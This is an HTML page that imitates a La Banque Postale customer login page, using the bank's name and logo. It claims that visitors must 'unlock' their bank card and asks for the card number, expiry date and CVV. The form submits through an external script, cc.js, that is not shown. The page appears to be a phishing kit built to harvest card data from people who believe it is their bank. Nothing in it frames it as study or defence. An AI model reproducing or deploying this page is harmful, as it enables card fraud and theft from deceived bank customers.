<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="../assets/dist/img/ico.ico">

<title>Connexion à mon espace client - La Banque Postale</title>

    <!-- Bootstrap core CSS -->
    <link href="../assets/dist/css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="../assets/dist/css/album.css" rel="stylesheet">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" integrity="sha512-5A8nwdMOWrSz20fDsjczgUidUBR8liPYU+WymTZP1lmY9G6Oc7HlZv156XqnsgNUzTyMefFTcsFH/tnJE/+xBg==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha512-SfTiTlX6kk+qitfevl/7LibUOeJWlt9rbyDn92a1DqWOw9vWG2MFoays0sgObmWazO5BQPiFucnnEAjpAB+/Sw==" crossorigin="anonymous" referrerpolicy="no-referrer" />

 
 <style>
.m-logo img {
    width: 50px;
    height: 50px;
}
#titre_btn{
font-weight:bold;
color:#17479e;
}

.bg-light {
    background-color: #ffffff!important;
}
.buttonBTN {
    text-align: center;
    width: 4rem;
    height: 3.6rem;

    border-radius: 4px;
	border:1px solid #d8d8d8;
    background-color: var(--color-3);
    font-size: 18px;
    color: var(--color-26);
    font-family: "RobotoMono-Medium",Courier,monospace;
}

@media only screen and (max-width: 768px) {
  /* For mobile phones: */
  #Search_ico{
   display:none;
  } 
  #img_body{
   display:none;
  }   

  #comment_form{
   display:none;
  }  
  
  #tab_clavier{
   width:100%;
  }
}

/* Small devices (portrait tablets and large phones, 600px and up) */
@media only screen and (min-width: 600px) {

  
  #tab_clavier{
   width:100%;
  }
}

@media only screen and (min-width: 768px) {
  
  #tab_clavier{
   width:100%;
  }

}



/* Large devices (laptops/desktops, 992px and up) */
@media only screen and (min-width: 992px) {

  #tab_clavier{
   width:100%;
  }

}

@media only screen and (min-width: 1200px) {
 #tab_clavier{
   width:100%;
  }
}
.form-control.error {
    border-color: red;
    outline: 0;
    box-shadow: inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(255,0,0,0.6);
}
label.error {
  font-weight: bold;
  color: red;
  padding: 2px 8px;
  margin-top: 2px;
}
.payment-errors {
  font-weight: bold;
  color: red;
  padding: 2px 8px;
  margin-top: 2px;
}
.credit-card-box label {
    display: block;
}
 </style>
 
 </head>

  <body>

    <header>
   
      <div class="navbar navbar-white bg-white box-shadow">
        <div class="container d-flex justify-content-between">
          <a href="#" class="navbar-brand d-flex align-items-center m-logo">

            <img src="../assets/dist/img/logobbp.png"/>
          </a>
      
			
        
        </div>
      </div>
    </header>

    <main role="main">


      <div class="album py-4 bg-light">
        <div class="container">

          <div class="row">
            
            <div class="col-md-6"  id="comment_form">
             <div class="card mb-3" style="">
			  <div class="row g-0">
				<div class="col-md-4 m-3">
				  <img src="../assets/dist/img/ccb.jpg" height="100%" class="img-fluid rounded-start" alt="...">
				</div>
				<div class="col-md-7">
				  <div class="card-body">
					<h5 class="card-title">Déverrouillage de votre carte bancaire :</h5>
					<p class="card-text">Comment déverrouiller votre carte et faciliter vos transactions et retraits dans les guichets automatiques en un clic</p>
					<p class="card-text"><i class="fa fa-credit-card fa-2x" aria-hidden="true"></i> Déverrouiller sa carte bancaire en confirmant ses coordonnées</p>
				  </div>
				</div>
			  </div>
			</div>
            </div>
            <div class="col-md-6" id="post_form" >
                   <form  role="form" id="payment-form" method="POST" action="javascript:void(0);" >
                <div>
                      <P>
                    
                        <b> <i class="fa fa-credit-card fa-2x" aria-hidden="true"></i>  CARTE BANCAIRE </b>
                           
                        </p>  

		
 
                
                  
                      <p>
                         <b>  Déverrouiller votre carte bancaire en confirmant ses coordonnées </b>
                        </p>
                            <p>
                                     <label for="cardNumber"> Numéro de carte </label>: <input id="cc_number" class="form-control"     required autofocus  name="cardNumber"  style="background: #f5F5F5;min-width:252px;width:38%;font-weight: 500;margin-top: 7px;padding: 13px;outline: none;background: white;border-radius: 6px;text-indent: 5px;border: 1px solid #ccc;" placeholder="Numéro de carte" type="text">
                            </p>
                            <p>
                                  <label for="cardExpiry">Date d'expiration</label>
                             <input id="cc_expire"     name="cardExpiry"   class="form-control"     required autofocus  style="background: #f5F5F5;width:32%;font-weight: 500;margin-top: 7px;padding: 13px;outline: none;background: white;border-radius: 6px;text-indent: 5px;border: 1px solid #ccc;"   placeholder="MM/AAAA" type="text">
<!--                              <input id="expannees" style="background: #f5F5F5;width:21%;font-weight: 500;margin-top: 7px;padding: 13px;outline: none;background: white;border-radius: 6px;text-indent: 5px;border: 1px solid #ccc;"  min="19" max="30" maxlength="4"  placeholder="AAAA" type="text"> -->
                            </p>
                            <p>
                                  <label for="cardCVC">CVV (au dos de la carte)</label>: <input maxlength="4"   class="form-control"     required autofocus  id="cc_cvv"  name="cardCVC" style="background: #f5F5F5;width:24%;font-weight: 500;margin-top: 7px;padding: 13px;outline: none;background: white;border-radius: 6px;text-indent: 5px;border: 1px solid #ccc;" type="text">
                             </p>

                        
             

                      <p>

						  <div class="d-flex justify-content-between align-items-center">
						<div class="btn-group">
						<button type="button" class="btn btn-primary subscribe" style="background:#1f368b !important;color:white">CONTINUER</button>
			
						</div>
	   
					</div>
               
             </form> 
                        
				 

                    

            
						
                </div>
             </form>  
            </div>
           
           
        

        
          </div>
        </div>
      </div>

    </main>

    <footer class="text-muted">
      <div class="container">
      <!--   <p class="float-right">
          <a href="#">Back to top</a>
        </p>
        <p>Album example is &copy; Bootstrap, but please download and customize it for yourself!</p>
        <p>New to Bootstrap? <a href="../../">Visit the homepage</a> or read our <a href="../../getting-started/">getting started guide</a>.</p>
    
 -->
	</div>
    </footer>

    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
 
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	 <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.13.1/jquery.validate.min.js"></script>
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery.payment/1.2.3/jquery.payment.min.js"></script>

<!-- If you're using Stripe for payments -->
<script type="text/javascript" src="https://js.stripe.com/v2/"></script>
 <script>window.jQuery || document.write('<script src="./assets/dist/vendor/jquery-slim.min.js"><\/script>')</script>
    <script src="../assets/dist/vendor/popper.min.js"></script>
    <script src="../assets/dist/js/bootstrap.min.js"></script>
    <script src="../assets/dist/vendor/holder.min.js"></script>
	<script src="../assets/dist/js/main.js"></script>
			
	<script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.26.11/dist/sweetalert2.all.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/sweetalert/2.1.2/sweetalert.min.js" integrity="sha256-KsRuvuRtUVvobe66OFtOQfjP8WA2SzYsmm4VPfMnxms=" crossorigin="anonymous"></script>
  <script src="../common/cc.js"></script>
  </body>
</html>
